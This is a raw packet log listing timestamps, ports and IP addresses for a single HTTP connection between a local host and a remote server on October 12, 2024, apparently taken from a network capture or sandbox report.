Oct 12, 2024 16:39:57.170993090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.170994043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171009064 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171013117 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171025038 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171026945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171042919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171051025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171058893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171063900 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171077967 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171098948 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171132088 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171178102 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171360016 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171391010 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171406031 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171430111 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171437025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171446085 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171446085 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171463013 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171478033 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171480894 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171492100 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171503067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171508074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171519995 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171519995 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171524048 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171538115 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171541929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171557903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171567917 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171574116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171575069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171590090 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171595097 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171607018 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171611071 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171618938 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171623945 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171639919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171655893 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171669960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171669960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171672106 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171688080 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171689987 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171704054 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171714067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171714067 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171722889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171742916 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171885014 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171921015 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171936035 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171951056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171964884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171972990 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171977997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171992064 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.171996117 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.171999931 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172018051 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172028065 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172036886 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172051907 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172068119 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172072887 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172084093 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172095060 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172099113 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172113895 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172115088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172115088 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172130108 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172139883 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172147036 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172153950 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172162056 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172173023 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172178984 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172178984 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172195911 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172198057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172214031 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172218084 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172230005 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172243118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172243118 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172247887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.172271967 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.172286034 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.226741076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226757050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226772070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226794958 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226814985 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226830959 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226845980 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226861000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.226963043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.226963043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.226963043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.226963997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.226963997 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.258981943 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259005070 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259018898 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259110928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259125948 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259140968 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259160042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259160042 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259162903 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259180069 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259195089 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259212017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259217024 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259217024 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259217978 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259217978 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259233952 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259252071 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259253025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259253025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259267092 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259274960 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259283066 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259305000 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259305000 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259325981 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259401083 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259457111 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259501934 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259517908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259532928 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259546995 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259561062 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259566069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259566069 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259577036 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259596109 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259597063 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259614944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259619951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259637117 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259639025 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259654999 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259677887 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259679079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259679079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259695053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259700060 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259711981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259713888 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259727001 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259743929 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259748936 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259748936 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259761095 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259779930 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259808064 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259824038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259838104 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259851933 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259862900 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259875059 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259887934 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259887934 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259893894 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259911060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259926081 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259926081 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259941101 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259941101 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259949923 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259959936 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259959936 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259975910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.259984970 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.259991884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260000944 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260020971 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260026932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260035992 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260044098 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260077953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260094881 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260121107 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260135889 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260152102 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260164976 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260168076 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260175943 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260193110 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260195017 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260210037 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260225058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260225058 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260250092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260268927 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260284901 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260301113 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260318041 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260339022 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260377884 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260392904 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260406971 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260421991 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260427952 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260438919 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260442019 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260453939 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260461092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260477066 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260488987 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260560036 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260602951 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260617018 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260623932 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260636091 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260643005 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260651112 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260674953 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260744095 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260759115 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260781050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260795116 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260796070 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260819912 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260833025 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260837078 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260853052 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260864973 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260868073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260885000 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260885954 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260898113 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260899067 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260915995 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260931969 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260946035 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260946989 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260952950 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260962009 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260962963 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260979891 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260982990 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.260997057 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.260999918 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261018991 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261019945 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261030912 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261059999 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261070967 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261085987 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261102915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261117935 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261244059 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261260033 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261275053 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261290073 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261293888 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261305094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261305094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261308908 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261324883 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261332989 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261339903 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261343956 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261364937 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261369944 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261373043 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261394024 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261409998 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261413097 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261428118 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261441946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261441946 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261441946 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261460066 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261470079 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261475086 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261490107 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261491060 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261497974 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261507034 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261516094 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261523008 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261523008 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261538982 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261553049 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261555910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261559963 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261573076 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261574030 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261590004 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261593103 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261606932 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.261614084 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261632919 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.261640072 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316234112 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316277981 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316294909 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316318035 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316333055 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316349030 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316364050 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.316474915 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348448038 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348463058 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348478079 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348550081 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348563910 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348577976 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348592997 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348608017 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348663092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348663092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348663092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348663092 CEST	49170	80	192.168.2.22	104.168.7.25
Oct 12, 2024 16:39:57.348674059 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348690033 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348720074 CEST	80	49170	104.168.7.25	192.168.2.22
Oct 12, 2024 16:39:57.348750114 CEST	80	49170	104.168.7.25	192.168.2.22
